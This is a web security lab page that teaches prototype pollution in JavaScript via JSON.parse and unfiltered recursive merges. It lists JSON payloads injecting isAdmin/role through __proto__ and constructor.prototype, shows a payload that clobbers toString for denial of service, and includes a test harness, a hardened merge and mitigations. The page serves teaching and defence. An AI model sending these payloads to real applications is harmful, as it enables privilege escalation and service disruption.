Lab 2: Prototype Pollution with JSON

Prototype pollution via JSON.parse

Difficulty: Medium

Lab Overview

This lab demonstrates prototype pollution that starts with JSON.parse() on untrusted input. JSON.parse() itself does not touch any prototype: a document such as {"__proto__": {...}} is parsed into an object whose own property is literally named "__proto__". The pollution happens when the application then copies that parsed object into another object with an unfiltered recursive merge, because target["__proto__"] resolves to Object.prototype and the attacker's properties land there, where every object in the process inherits them.

Objective: Understand how JSON-based prototype pollution attacks work and how to exploit them.

Vulnerable Application
API Configuration Parser

This application processes JSON configuration data from API requests. Try to exploit prototype pollution vulnerabilities:

JSON Prototype Pollution Tester
⚠️ JSON Prototype Pollution Warning

This lab demonstrates JSON-based prototype pollution. The ingredients are:

  • JSON.parse() - Keeps "__proto__" and "constructor" as ordinary own keys in the parsed object
  • Recursive merge - Copies those keys into application objects with target[key] = source[key]
  • __proto__ - Direct prototype access
  • constructor - Constructor property access (constructor.prototype)
  • No validation - Missing key filtering before the merge
JSON Attack Vectors

These JSON properties can be exploited for prototype pollution:

  • __proto__ - Direct prototype access
  • constructor - Constructor property access
  • prototype - Prototype property access; reaches Object.prototype when the object being merged into is a function such as Object itself
  • constructor.prototype - Nested prototype access that works even where the literal key __proto__ is blocked
JSON Prototype Pollution Demo
JavaScript JSON Prototype Pollution Demonstration:

This demonstrates how a __proto__ key that survives JSON.parse() pollutes Object.prototype once the parsed object is merged into another object by an unfiltered recursive merge:

// The parser itself: JSON.parse() yields an object with an own key named
// "__proto__"; Object.prototype is still untouched at this point
function processConfig(jsonString) {
  const config = JSON.parse(jsonString);
  return merge({ debug: false }, config); // the unsafe step: merge into defaults
}
// Naive recursive merge, the kind found in hand-written config/extend helpers
function isObj(v) { return v !== null && (typeof v === 'object' || typeof v === 'function'); }
function merge(target, source) {
  for (const key in source) {
    if (isObj(source[key])) {
      if (!isObj(target[key])) target[key] = {};
      merge(target[key], source[key]); // for key "__proto__", target[key] IS Object.prototype
    } else {
      target[key] = source[key];       // so here Object.prototype.isAdmin = true
    }
  }
  return target;
}
// Attacker input
const maliciousJSON = '{"__proto__": {"isAdmin": true, "role": "admin"}}';
// Parse and merge the malicious JSON
const config = processConfig(maliciousJSON);
// Now all objects inherit the polluted properties
console.log({}.isAdmin); // true
console.log({}.role); // "admin"
// Even objects created afterwards are affected
const newObj = {};
console.log(newObj.isAdmin); // true

The demo above shows that JSON.parse() only delivers the "__proto__" key; the merge that follows is what writes into Object.prototype and affects every object in the process. Without the merge, config.isAdmin would be undefined and {}.isAdmin would stay undefined.
Vulnerability Details
  • Type: JSON Prototype Pollution
  • Severity: Medium
  • Method: __proto__ or constructor.prototype keys in parsed JSON reaching a recursive merge
  • Issue: Parsed keys copied into application objects without filtering
Attack Vectors
  • JSON.parse(): Preserves "__proto__" as an ordinary own key instead of dropping it
  • __proto__ Access: Direct modification of Object.prototype once the key is merged
  • Constructor Access: constructor.prototype reaches Object.prototype without the literal key __proto__
  • Nested Access: Deep prototype manipulation through nested objects or arrays, which a top-level-only check misses
JSON Prototype Pollution Examples

Use these techniques to exploit JSON-based prototype pollution vulnerabilities:

1. Basic JSON __proto__ Pollution:
{ "__proto__": { "isAdmin": true, "role": "admin", "permissions": ["read", "write", "delete"] } }
2. JSON Constructor Pollution:
{ "constructor": { "prototype": { "isAdmin": true, "role": "admin" } } }
3. JSON Nested Prototype Pollution:
{ "constructor": { "prototype": { "constructor": { "prototype": { "isAdmin": true } } } } }
4. Clobbering built-in Object.prototype methods (denial of service):
{ "__proto__": { "toString": "hacked", "hasOwnProperty": "hacked", "valueOf": 0 } }
A JSON document cannot carry a function body, so a payload such as { "__proto__": { "toString": function() { return "hacked"; } } } is rejected by JSON.parse() with a SyntaxError before any merge runs. What a JSON-only attacker can do is overwrite an inherited method with a non-function value: after the payload above is merged, every obj.toString(), obj.hasOwnProperty(key) and implicit string conversion of a plain object throws a TypeError.
5. Pollution inherited by arrays, strings, numbers, booleans and dates:
{ "__proto__": { "isAdmin": true, "length": 999 } }
The __proto__ of a parsed object reaches Object.prototype only. Array.prototype, String.prototype, Number.prototype, Boolean.prototype and Date.prototype sit in front of it and define their own push, charAt, valueOf, getTime and length, so those cannot be replaced through this path. Properties the built-in prototypes do not define fall through, which is why [].isAdmin, "x".isAdmin, (5).isAdmin, true.isAdmin and new Date().isAdmin all become true, and why ({}).length becomes 999.
6. JSON Complex Nested Pollution:
{ "data": { "__proto__": { "isAdmin": true } }, "config": { "constructor": { "prototype": { "role": "admin" } } } }
7. JSON Array of Objects Pollution:
[ { "__proto__": { "isAdmin": true } }, { "constructor": { "prototype": { "role": "admin" } } } ]
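The payloads above, run through a naive recursive merge of the kind described in the demo, as an added example that is not the lab's own code. The lab's real parser is not shown on this page; the unsafeMerge helper, the probe-and-cleanup logic and the payload names are mine, and the JSON strings are constructed to mirror the list above. Each payload is merged into a fresh object, a new {} is then probed for inherited isAdmin/role, and whatever leaked is deleted again so the payloads stay independent.

```javascript
// Added example (not the lab's own code): feeds the JSON payloads listed above
// through a naive recursive merge and reports which ones reach Object.prototype.
// The merge is a stand-in I wrote for the lab's unseen config parser.
'use strict';

function isObj(v) {
  return v !== null && (typeof v === 'object' || typeof v === 'function');
}

// Naive deep merge: no key filtering, recurses through existing target properties.
// For key "__proto__", target[key] resolves to Object.prototype via the accessor;
// for key "constructor", target[key] is the Object function, whose .prototype is
// Object.prototype. Both paths end up assigning on Object.prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isObj(source[key])) {
      if (!isObj(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Returns { polluted: [names], error: errorName|null } for one JSON string.
// Probes a fresh {} afterwards, then removes what leaked so runs stay independent.
function tryPayload(json, probeKeys) {
  let error = null;
  try {
    unsafeMerge({ debug: false }, JSON.parse(json));
  } catch (e) {
    error = e.name; // SyntaxError for non-JSON input, before any merge runs
  }
  const probe = {};
  const polluted = probeKeys.filter((k) => probe[k] !== undefined);
  for (const k of polluted) delete Object.prototype[k];
  return { polluted, error };
}

// Constructed payloads (mirroring the list above; names are mine)
const PAYLOADS = {
  proto:        '{"__proto__": {"isAdmin": true, "role": "admin"}}',
  ctorProto:    '{"constructor": {"prototype": {"isAdmin": true, "role": "admin"}}}',
  nested:       '{"constructor": {"prototype": {"constructor": {"prototype": {"isAdmin": true}}}}}',
  complex:      '{"data": {"__proto__": {"isAdmin": true}}, "config": {"constructor": {"prototype": {"role": "admin"}}}}',
  arrayOfObjs:  '[{"__proto__": {"isAdmin": true}}, {"constructor": {"prototype": {"role": "admin"}}}]',
  // A function body is not JSON: JSON.parse rejects it, so nothing is merged
  withFunction: '{"__proto__": {"toString": function() { return "hacked"; }}}',
};

function runAll() {
  const results = {};
  for (const [name, json] of Object.entries(PAYLOADS)) {
    results[name] = tryPayload(json, ['isAdmin', 'role']);
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(runAll());
}
```

Every data-only payload reaches Object.prototype through this merge, including the array form (the array indices "0" and "1" are merged like any other keys), while the function-bodied payload never gets past JSON.parse(). The cleanup in tryPayload is only there to keep the demonstration repeatable; in a real process nothing deletes the polluted properties.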
Real-World Attack Scenarios
Mitigation Strategies
  • Filter the keys __proto__, constructor and prototype in every recursive merge, deep clone and "set by path" routine; that is where the bug lives, not in JSON.parse()
  • Copy only own keys (Object.keys, Object.hasOwn) when merging untrusted input, never a bare for...in over it
  • Use Object.create(null) for configuration and lookup objects so there is no prototype to reach and nothing to inherit
  • Use a JSON.parse reviver that returns undefined for __proto__, constructor and prototype, which deletes those keys while parsing
  • Use Object.freeze(Object.prototype) early at startup so pollution becomes a silent no-op; test first, because libraries that extend built-in prototypes will break
  • Run Node with --disable-proto=delete (or =throw) so the Object.prototype.__proto__ accessor no longer exists
  • Implement proper authentication and authorization server-side; never derive a privilege from a property such as isAdmin that may be inherited, and check it with Object.hasOwn rather than truthiness
  • Monitor for unusual object behavior: unexpected inherited properties on fresh objects, or TypeErrors from a clobbered toString or hasOwnProperty
  • Regular security testing and vulnerability assessments, running the payloads above against every merge/extend code path
  • Validate request bodies against a schema with an allow-list of expected keys before merging, and rate limit the configuration endpoint
  • Use a maintained deep-merge library that has been patched against prototype pollution rather than a hand-written one
  • Educate developers about prototype pollution
  • Implement proper error handling so malformed JSON is rejected with a clean error rather than a crash
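The same configuration merge hardened in two independent ways, as an added example that is not the lab's own code: a safe merge that copies only own keys, skips the three dangerous names and builds nested containers with Object.create(null), and a JSON.parse reviver that drops those keys during parsing. Function names and the attacker payload are mine; the code assumes Node 16.9 or later for Object.hasOwn. Object.freeze(Object.prototype) and --disable-proto are deliberately left out of the block because they change the whole process, not just this code path.

```javascript
// Added example (not the lab's own code): hardened replacements for the naive
// merge and parse steps. Names are mine; the lab's real parser is not shown.
'use strict';

const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// 1. Safe deep merge: own enumerable keys only, blocked names skipped, and
//    nested containers created with a null prototype so there is nothing to
//    climb into even if a blocked name somehow slipped through.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.hasOwn(target, key) || !isPlainObject(target[key])) {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// 2. JSON.parse reviver: returning undefined deletes the property from its
//    holder, so the dangerous keys never exist in the parsed tree at all.
function parseConfigJSON(jsonString) {
  return JSON.parse(jsonString, (key, value) =>
    (BLOCKED_KEYS.has(key) ? undefined : value));
}

function processConfigSafely(jsonString) {
  const defaults = Object.create(null); // no prototype, so no inherited flags
  defaults.debug = false;
  return safeMerge(defaults, parseConfigJSON(jsonString));
}

// Constructed attacker input: all three vectors plus one legitimate key
const maliciousJSON =
  '{"__proto__": {"isAdmin": true},' +
  ' "constructor": {"prototype": {"role": "admin"}},' +
  ' "data": {"__proto__": {"isAdmin": true}},' +
  ' "debug": true}';

function demo() {
  const config = processConfigSafely(maliciousJSON);
  return {
    debug: config.debug,                // legitimate key still merged
    hasData: 'data' in config,          // nested object kept, its __proto__ key dropped
    dataHasProto: Object.hasOwn(config.data, '__proto__'),
    polluted: ({}).isAdmin !== undefined || ({}).role !== undefined,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Either layer alone stops every payload on this page; using both means a future merge helper that forgets the filter is still fed a tree that contains nothing dangerous. Note that the reviver removes the "constructor" key entirely, so a configuration schema that legitimately needs a field by that name has to rename it or rely on the merge-side filter only.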